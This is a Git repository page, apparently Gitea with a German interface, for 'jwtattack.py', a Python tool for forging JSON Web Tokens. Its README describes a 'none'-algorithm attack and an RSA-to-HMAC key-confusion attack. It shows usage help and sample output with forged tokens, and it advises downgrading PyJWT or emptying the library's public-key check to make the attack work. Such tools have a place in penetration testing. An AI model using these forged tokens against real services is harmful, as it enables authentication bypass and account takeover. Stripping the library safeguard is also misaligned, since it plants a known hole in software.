1
0
Fork 0
Create malicious jwt tokens
Du kannst nicht mehr als 25 Themen auswählen Themen müssen entweder mit einem Buchstaben oder einer Ziffer beginnen. Sie können Bindestriche („-“) enthalten und bis zu 35 Zeichen lang sein.
Simon Moser a99f872d45 „README.md“ ändern vor 3 Jahren
.gitignore Add jwtattack to git vor 3 Jahren
README.md „README.md“ ändern vor 3 Jahren
jwtattack.py Add jwtattack to git vor 3 Jahren
logger.py Add jwtattack to git vor 3 Jahren

README.md

jwtattack.py

Requirements

  • Python3
  • PyJWT 0.4.3: pip install pyjwt==0.4.3

later versions don't allow public keys for symmetric signatures

Alternative: replace

invalid_strings = [
    b'-----BEGIN PUBLIC KEY-----',
    b'-----BEGIN CERTIFICATE-----',
    b'-----BEGIN RSA PUBLIC KEY-----',
    b'ssh-rsa'
]

in algorithms.py with

invalid_strings = []

Usage

$ ./jwtattack.py -h
usage: jwtattack.py [-h] [-V] [-v] [-a] [-n] [-r] [-H HEADERS [HEADERS ...]]
                    [-D DATA [DATA ...]]
                    token [PUBLIC_KEY]

This script tries to create malicious JSON Web Tokens

positional arguments:
  token                 the JWT to attack

optional arguments:
  -h, --help            show this help message and exit
  -V, --version         show program's version number and exit
  -v, --verbose         display verbose output

Attack options:
  Select attack options to generate malicious tokens

  -a, --all             generate all possible malicious tokens
  -n, --none            generate a token using the 'none' algorithm
  -r, --rsa             generate a token signed with the public key
  PUBLIC_KEY            public key for the RSA attack (alternatively stdin)
  -H HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
                        Changes to apply to the header, format key:value
  -D DATA [DATA ...], --data DATA [DATA ...]
                        Changes to apply to the data, format key:value

Sample output

$ echo "-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3WojgGHFHYLugd
UWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlvdbH6dvEOfou0/gCFQs
HUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GUnKHkkle+Q0pX/g6jXZ7r1/xAK5D
o2kQ+X5xK9cipRgEKwIDAQAB
-----END PUBLIC KEY-----" | ./jwtattack.py -a eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.TCYt5XsITJX1CxPCT8yAV-TVkIEq_PbChOMqsLfRoPsnsgw5WEuts01mq-pQy7UJiN5mgRxD-WUcX16dUEMGlv50aqzpqh4Qktb3rk-BuQy72IFLOqV0G_zS245-kronKb78cPN25DGlcTwLtjPAYuNzVBAh4vGHSrQyHUdBBPM
None: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.
RSA: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.mm69FICCR3LpghwmUJDjrwcrXlqkvgbKGiLhUp-jI5U